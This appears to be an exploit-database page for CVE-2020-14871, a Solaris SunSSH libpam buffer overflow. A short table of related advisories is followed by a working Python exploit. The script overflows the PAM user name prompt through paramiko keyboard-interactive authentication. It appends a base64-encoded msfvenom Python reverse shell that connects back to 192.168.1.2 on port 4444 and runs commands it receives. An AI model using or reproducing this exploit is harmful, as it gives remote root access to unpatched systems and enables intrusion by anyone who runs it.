| Reporter | Title | Published | Views |
|---|---|---|---|
| zdt | SunSSH 11.0 x86 - libpam Remote Root Exploit | 15 Dec 2020 00:00 | – |
| zdt | Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow Exploit | 17 Dec 2020 00:00 | – |
| zdt | Solaris SunSSH 11.0 x86 - libpam Remote Root Exploit (3) | 21 Jun 2021 00:00 | – |
| githubexploit | exploits | 25 May 2026 01:12 | – |
| attackerkb | CVE-2020-14871 | 21 Oct 2020 00:00 | – |
| avleonov | Last Week’s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee | 28 Jun 2021 10:59 | – |
| circl | CVE-2020-14871 | 2 Nov 2020 19:35 | – |
| cisa_kev | Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability | 3 Nov 2021 00:00 | – |
| cnvd | Oracle Solaris Remote Code Execution Vulnerability | 26 Oct 2020 00:00 | – |
| checkpoint_advisories | Oracle Solaris Buffer Overflow (CVE-2020-14871) | 11 Nov 2020 00:00 | – |

# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
# Original Exploit Author: Hacker Fantastic
# Metasploit Module Author: wvu
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
# Version: 10
# Tested on: SunOS solaris 10
# CVE: CVE-2020-14871
# Ported By: legend
import socket
import paramiko
from time import sleep
payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe"
payload+=b"python${IFS}-c${IFS}\""
# msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444
payload+=b"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCBhcyBzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHIKc289cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pCnNvLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQ0NCkpCndoaWxlIFRydWU6CglkPXNvLnJlY3YoMTAyNCkKCWlmIGxlbihkKT09MDoKCQlicmVhawoJcD1yLlBvcGVuKGQsc2hlbGw9VHJ1ZSxzdGRpbj1yLlBJUEUsc3Rkb3V0PXIuUElQRSxzdGRlcnI9ci5QSVBFKQoJbz1wLnN0ZG91dC5yZWFkKCkrcC5zdGRlcnIucmVhZCgpCglzby5zZW5kKG8pCg==')[0]))"
payload+=b"\""
print("Length => %d" % (len(payload)))
def inter_handler(title, instructions, prompt_list):
    # keyboard-interactive callback: answers the PAM user name prompt with the payload
    resp = []  # Initialize the response container
    for pr in prompt_list:
        print(pr)
        if pr[0].startswith('Please enter user name:'):
            sleep(10)
            resp.append(payload)
            print("Your payload is sent, check your nc")
    return tuple(resp)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.2", 22))
ts = paramiko.Transport(sock)
ts.start_client(timeout=10)
ts.auth_interactive(username="", handler=inter_handler)